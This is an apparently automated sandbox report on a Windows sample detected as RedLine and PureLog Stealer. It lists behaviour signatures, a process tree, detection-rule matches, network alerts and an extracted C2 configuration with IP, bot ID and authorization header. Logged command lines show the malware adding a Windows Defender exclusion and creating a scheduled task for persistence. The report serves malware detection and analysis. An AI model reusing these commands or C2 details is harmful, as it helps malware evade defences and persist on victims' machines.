Windows Analysis Report
AENiBH7X1q.exe

Overview

General Information

Sample name: AENiBH7X1q.exe (renamed because original name is a hash value)
Original sample name: 78897e2d5b18ff4a71db6703ec5781abedff5794bd79fcee70babd7b0622eef8.exe
Analysis ID: 1549472
MD5: fe364f6ff698a792c2f9527120136202
SHA1: f3b1c3a44b03ee27911de7a7016ee29865765788
SHA256: 78897e2d5b18ff4a71db6703ec5781abedff5794bd79fcee70babd7b0622eef8
Tags: exe, RedLineStealer, user-adrian__luca
Detection

PureLog Stealer, RedLine
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected PureLog Stealer
Yara detected RedLine Stealer
.NET source code contains method to dynamically call methods (often used by packers)
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Contains functionality to behave differently if execute on a Russian/Kazak computer
Contains functionality to detect sleep reduction / modifications
Creates files in the system32 config directory
Creates files inside the volume driver (system volume information)
Drops executable to a common third party application directory
Found direct / indirect Syscall (likely to bypass EDR)
Infects executable files (exe, dll, sys, html)
Installs a global keyboard hook
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Queries random domain names (often used to prevent blacklisting and sinkholes)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Connects to many different domains
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to detect virtual machines (SLDT)
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Enables driver privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Queries time zone information
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Uncommon Svchost Parent Process
Spawns drivers
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • AENiBH7X1q.exe (PID: 6600 cmdline: "C:\Users\user\Desktop\AENiBH7X1q.exe" MD5: FE364F6FF698A792C2F9527120136202)
    • svchost.exe (PID: 4512 cmdline: "C:\Users\user\Desktop\AENiBH7X1q.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • microsofts.exe (PID: 1816 cmdline: "C:\Users\user\AppData\Local\Temp\microsofts.exe" MD5: 1B1EC94BDE0A57A4A82BD2F20B2CB7F3)
      • Native_Redline_BTC.exe (PID: 1900 cmdline: "C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe" MD5: 8C8785AC6585CF5C794B74330B3DB88F)
        • build.exe (PID: 1412 cmdline: "C:\Users\user\AppData\Local\Temp\build.exe" MD5: 3B6501FEEF6196F24163313A9F27DBFD)
        • server_BTC.exe (PID: 1352 cmdline: "C:\Users\user\AppData\Local\Temp\server_BTC.exe" MD5: 50D015016F20DA0905FD5B37D7834823)
          • powershell.exe (PID: 2944 cmdline: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
            • conhost.exe (PID: 2764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • conhost.exe (PID: 7104 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • WmiPrvSE.exe (PID: 7104 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
          • schtasks.exe (PID: 6348 cmdline: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 11:07 /du 23:59 /sc daily /ri 1 /f MD5: 48C2FE20575769DE916F48EF0676A965)
          • TrojanAIbot.exe (PID: 1784 cmdline: "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" MD5: 50D015016F20DA0905FD5B37D7834823)
          • cmd.exe (PID: 2284 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpEAAD.tmp.cmd"" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 3620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • timeout.exe (PID: 1964 cmdline: timeout 6 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
  • alg.exe (PID: 1492 cmdline: C:\Windows\System32\alg.exe MD5: 35184A2F5B6B06D8E814BA39A601EA5C)
  • AppVStrm.sys (PID: 4 cmdline: MD5: BDA55F89B69757320BC125FF1CB53B26)
  • AppvVemgr.sys (PID: 4 cmdline: MD5: E70EE9B57F8D771E2F4D6E6B535F6757)
  • AppvVfs.sys (PID: 4 cmdline: MD5: 2CBABD729D5E746B6BD8DC1B4B4DB1E1)
  • AppVClient.exe (PID: 5776 cmdline: C:\Windows\system32\AppVClient.exe MD5: C44491674DD9A23CD4DB0BCF383E02D9)
  • TrojanAIbot.exe (PID: 5628 cmdline: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe MD5: 50D015016F20DA0905FD5B37D7834823)
  • FXSSVC.exe (PID: 432 cmdline: C:\Windows\system32\fxssvc.exe MD5: 7FF4977D46F3519BDDBBC7F980695D96)
  • elevation_service.exe (PID: 2820 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe" MD5: AB5074630045AB26B71225715D67B7F6)
  • maintenanceservice.exe (PID: 7184 cmdline: "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe" MD5: 7BBB6DB310D239DA8D65A687C939EAA5)
  • msdtc.exe (PID: 7252 cmdline: C:\Windows\System32\msdtc.exe MD5: B997E00A6861615E066CA0DA6FBA54A6)
  • PerceptionSimulationService.exe (PID: 7412 cmdline: C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe MD5: A1956F0F6BD74F7EF4C9CB4215174395)
  • perfhost.exe (PID: 7492 cmdline: C:\Windows\SysWow64\perfhost.exe MD5: 5A2927C6AC02ED9AAA0EEAD979B6927B)
  • Locator.exe (PID: 7540 cmdline: C:\Windows\system32\locator.exe MD5: 9A657A7F089C2AF389D25AD39498587D)
  • SensorDataService.exe (PID: 7572 cmdline: C:\Windows\System32\SensorDataService.exe MD5: 49C1710C0BFB918B23DDE91B5109B005)
  • TrojanAIbot.exe (PID: 7624 cmdline: "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" MD5: 50D015016F20DA0905FD5B37D7834823)
  • snmptrap.exe (PID: 7652 cmdline: C:\Windows\System32\snmptrap.exe MD5: 579893F6B0B6C9ED87C94C25F4EDC7E0)
  • Spectrum.exe (PID: 7696 cmdline: C:\Windows\system32\spectrum.exe MD5: 5C7A9FB953BDB52056F816EFDBDB2113)
  • ssh-agent.exe (PID: 7812 cmdline: C:\Windows\System32\OpenSSH\ssh-agent.exe MD5: E3FDD9F1AB11BF5FA018CD72E8AF127F)
  • TieringEngineService.exe (PID: 7844 cmdline: C:\Windows\system32\TieringEngineService.exe MD5: 34A80D2A50958A3B610C920E02938885)
  • AgentService.exe (PID: 7896 cmdline: C:\Windows\system32\AgentService.exe MD5: 9543A0B25A6C0199CB8A7CB3D1E158F8)
  • vds.exe (PID: 7936 cmdline: C:\Windows\System32\vds.exe MD5: 2DBE73EC9F3D022F74934054582A8EBA)
  • wbengine.exe (PID: 8036 cmdline: "C:\Windows\system32\wbengine.exe" MD5: C0B66BD1EE3D66E90E2046376956878E)
  • cleanup
Name: RedLine Stealer
Description: RedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer
{"C2 url": ["212.162.149.53:2049"], "Bot Id": "FOZ", "Authorization Header": "c74790bd166600f1f665c8ce201776eb"}
Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\Temp\microsofts.exe | MALWARE_Win_RedLine | Detects RedLine infostealer | ditekSHen
  • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
  • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
  • 0x700:$s3: 83 EC 38 53 B0 33 88 44 24 2B 88 44 24 2F B0 50 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
  • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
  • 0x1e9d0:$s5: delete[]
  • 0x1de88:$s6: constructor or from DllMain.
C:\Users\user\AppData\Local\Temp\build.exe | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security

Source | Rule | Description | Author | Strings
00000004.00000002.2126254452.0000000012F52000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
00000003.00000003.2390841675.0000000007550000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
00000004.00000000.2105969324.0000000000AB2000.00000002.00000001.01000000.00000008.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
00000004.00000002.2126254452.0000000012E79000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
00000006.00000000.2122053176.0000000000DE2000.00000002.00000001.01000000.0000000A.sdmp | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
Source | Rule | Description | Author | Strings
3.3.microsofts.exe.5a0000.916.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
3.3.microsofts.exe.5b0000.935.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
4.2.Native_Redline_BTC.exe.12ec4d08.4.unpack | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
2.2.svchost.exe.5800000.1.raw.unpack | MALWARE_Win_RedLine | Detects RedLine infostealer | ditekSHen
  • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
  • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
  • 0x700:$s3: 83 EC 38 53 B0 33 88 44 24 2B 88 44 24 2F B0 50 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
  • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
  • 0x1e9d0:$s5: delete[]
  • 0x1de88:$s6: constructor or from DllMain.
3.3.microsofts.exe.5a0000.915.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\server_BTC.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\server_BTC.exe, ParentProcessId: 1352, ParentProcessName: server_BTC.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , ProcessId: 2944, ProcessName: powershell.exe
Source: Process started | Author: Max Altgelt (Nextron Systems) | Data: Command: , CommandLine: , CommandLine|base64offset|contains: , Image: C:\Windows\System32\drivers\AppVStrm.sys, NewProcessName: C:\Windows\System32\drivers\AppVStrm.sys, OriginalFileName: C:\Windows\System32\drivers\AppVStrm.sys, ParentCommandLine: , ParentImage: , ParentProcessId: -1, ProcessCommandLine: , ProcessId: 4, ProcessName: AppVStrm.sys
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\server_BTC.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\server_BTC.exe, ParentProcessId: 1352, ParentProcessName: server_BTC.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , ProcessId: 2944, ProcessName: powershell.exe
Source: File created | Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) | Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\server_BTC.exe, ProcessId: 1352, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TrojanAIbot.exe.lnk
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 11:07 /du 23:59 /sc daily /ri 1 /f, CommandLine: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 11:07 /du 23:59 /sc daily /ri 1 /f, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\server_BTC.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\server_BTC.exe, ParentProcessId: 1352, ParentProcessName: server_BTC.exe, ProcessCommandLine: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 11:07 /du 23:59 /sc daily /ri 1 /f, ProcessId: 6348, ProcessName: schtasks.exe
Source: Network Connection | Author: frack113 | Data: DestinationIp: 51.195.88.199, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\AppData\Local\Temp\microsofts.exe, Initiated: true, ProcessId: 1816, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49711
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 11:07 /du 23:59 /sc daily /ri 1 /f, CommandLine: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 11:07 /du 23:59 /sc daily /ri 1 /f, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\server_BTC.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\server_BTC.exe, ParentProcessId: 1352, ParentProcessName: server_BTC.exe, ProcessCommandLine: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 11:07 /du 23:59 /sc daily /ri 1 /f, ProcessId: 6348, ProcessName: schtasks.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Users\user\Desktop\AENiBH7X1q.exe", CommandLine: "C:\Users\user\Desktop\AENiBH7X1q.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\AENiBH7X1q.exe", ParentImage: C:\Users\user\Desktop\AENiBH7X1q.exe, ParentProcessId: 6600, ParentProcessName: AENiBH7X1q.exe, ProcessCommandLine: "C:\Users\user\Desktop\AENiBH7X1q.exe", ProcessId: 4512, ProcessName: svchost.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\server_BTC.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\server_BTC.exe, ParentProcessId: 1352, ParentProcessName: server_BTC.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , ProcessId: 2944, ProcessName: powershell.exe
Source: Process started | Author: vburov | Data: Command: "C:\Users\user\Desktop\AENiBH7X1q.exe", CommandLine: "C:\Users\user\Desktop\AENiBH7X1q.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\AENiBH7X1q.exe", ParentImage: C:\Users\user\Desktop\AENiBH7X1q.exe, ParentProcessId: 6600, ParentProcessName: AENiBH7X1q.exe, ProcessCommandLine: "C:\Users\user\Desktop\AENiBH7X1q.exe", ProcessId: 4512, ProcessName: svchost.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-05T17:03:02.887458+0100 | 2022930 | 1 | A Network Trojan was detected | 4.175.87.197 | 443 | 192.168.2.5 | 59401 | TCP
2024-11-05T17:03:42.742917+0100 | 2022930 | 1 | A Network Trojan was detected | 4.175.87.197 | 443 | 192.168.2.5 | 59640 | TCP
2024-11-05T17:04:23.874141+0100 | 2051651 | 1 | A Network Trojan was detected | 192.168.2.5 | 54996 | 1.1.1.1 | 53 | UDP
2024-11-05T17:04:26.438965+0100 | 2051651 | 1 | A Network Trojan was detected | 192.168.2.5 | 56257 | 1.1.1.1 | 53 | UDP
2024-11-05T17:04:48.309363+0100 | 2051653 | 1 | A Network Trojan was detected | 192.168.2.5 | 56279 | 1.1.1.1 | 53 | UDP
2024-11-05T17:02:57.456122+0100 | 2051649 | 1 | A Network Trojan was detected | 192.168.2.5 | 51197 | 1.1.1.1 | 53 | UDP
2024-11-05T17:02:58.738163+0100 | 2051649 | 1 | A Network Trojan was detected | 192.168.2.5 | 54147 | 1.1.1.1 | 53 | UDP
2024-11-05T17:02:56.050638+0100 | 2051648 | 1 | A Network Trojan was detected | 192.168.2.5 | 55575 | 1.1.1.1 | 53 | UDP
2024-11-05T17:02:57.087877+0100 | 2051648 | 1 | A Network Trojan was detected | 192.168.2.5 | 50357 | 1.1.1.1 | 53 | UDP
2024-11-05T17:02:53.521181+0100 | 2018141 | 1 | A Network Trojan was detected | 18.141.10.107 | 80 | 192.168.2.5 | 49706 | TCP
2024-11-05T17:02:54.601386+0100 | 2018141 | 1 | A Network Trojan was detected | 54.244.188.177 | 80 | 192.168.2.5 | 49710 | TCP
2024-11-05T17:02:57.035218+0100 | 2018141 | 1 | A Network Trojan was detected | 44.221.84.105 | 80 | 192.168.2.5 | 59392 | TCP
2024-11-05T17:03:17.701232+0100 | 2018141 | 1 | A Network Trojan was detected | 47.129.31.212 | 80 | 192.168.2.5 | 59491 | TCP
2024-11-05T17:03:19.520664+0100 | 2018141 | 1 | A Network Trojan was detected | 13.251.16.150 | 80 | 192.168.2.5 | 59498 | TCP
2024-11-05T17:03:26.271989+0100 | 2018141 | 1 | A Network Trojan was detected | 34.246.200.160 | 80 | 192.168.2.5 | 59538 | TCP
2024-11-05T17:03:27.269331+0100 | 2018141 | 1 | A Network Trojan was detected | 18.208.156.248 | 80 | 192.168.2.5 | 59550 | TCP
2024-11-05T17:03:34.829754+0100 | 2018141 | 1 | A Network Trojan was detected | 35.164.78.200 | 80 | 192.168.2.5 | 59592 | TCP
2024-11-05T17:03:35.730953+0100 | 2018141 | 1 | A Network Trojan was detected | 3.94.10.34 | 80 | 192.168.2.5 | 59599 | TCP
2024-11-05T17:03:53.102955+0100 | 2018141 | 1 | A Network Trojan was detected | 34.211.97.45 | 80 | 192.168.2.5 | 59724 | TCP
2024-11-05T17:04:01.083801+0100 | 2018141 | 1 | A Network Trojan was detected | 18.246.231.120 | 80 | 192.168.2.5 | 59752 | TCP
2024-11-05T17:04:02.298627+0100 | 2018141 | 1 | A Network Trojan was detected | 3.254.94.185 | 80 | 192.168.2.5 | 59754 | TCP
2024-11-05T17:02:53.521181+0100 | 2037771 | 1 | A Network Trojan was detected | 18.141.10.107 | 80 | 192.168.2.5 | 49706 | TCP
2024-11-05T17:02:54.601386+0100 | 2037771 | 1 | A Network Trojan was detected | 54.244.188.177 | 80 | 192.168.2.5 | 49710 | TCP
2024-11-05T17:02:57.035218+0100 | 2037771 | 1 | A Network Trojan was detected | 44.221.84.105 | 80 | 192.168.2.5 | 59392 | TCP
2024-11-05T17:03:17.701232+0100 | 2037771 | 1 | A Network Trojan was detected | 47.129.31.212 | 80 | 192.168.2.5 | 59491 | TCP
2024-11-05T17:03:19.520664+0100 | 2037771 | 1 | A Network Trojan was detected | 13.251.16.150 | 80 | 192.168.2.5 | 59498 | TCP
2024-11-05T17:03:26.271989+0100 | 2037771 | 1 | A Network Trojan was detected | 34.246.200.160 | 80 | 192.168.2.5 | 59538 | TCP
2024-11-05T17:03:27.269331+0100 | 2037771 | 1 | A Network Trojan was detected | 18.208.156.248 | 80 | 192.168.2.5 | 59550 | TCP
2024-11-05T17:03:34.829754+0100 | 2037771 | 1 | A Network Trojan was detected | 35.164.78.200 | 80 | 192.168.2.5 | 59592 | TCP
2024-11-05T17:03:35.730953+0100 | 2037771 | 1 | A Network Trojan was detected | 3.94.10.34 | 80 | 192.168.2.5 | 59599 | TCP
2024-11-05T17:03:53.102955+0100 | 2037771 | 1 | A Network Trojan was detected | 34.211.97.45 | 80 | 192.168.2.5 | 59724 | TCP
2024-11-05T17:04:01.083801+0100 | 2037771 | 1 | A Network Trojan was detected | 18.246.231.120 | 80 | 192.168.2.5 | 59752 | TCP
2024-11-05T17:04:02.298627+0100 | 2037771 | 1 | A Network Trojan was detected | 3.254.94.185 | 80 | 192.168.2.5 | 59754 | TCP
2024-11-05T17:02:58.582766+0100 | 2850851 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 59396 | 172.234.222.138 | 80 | TCP
2024-11-05T17:04:00.505646+0100 | 2850851 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 59751 | 18.208.156.248 | 80 | TCP


AV Detection

Source: AENiBH7X1q.exe | Avira: detected
Source: C:\Program Files (x86)\AutoIt3\Au3Check.exe | Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe | Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe | Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe | Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe | Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe | Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe | Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe | Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe | Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Au3Info.exe | Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe | Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe | Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe | Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe | Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe | Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe | Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe | Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe | Avira: detection malicious, Label: W32/Infector.Gen
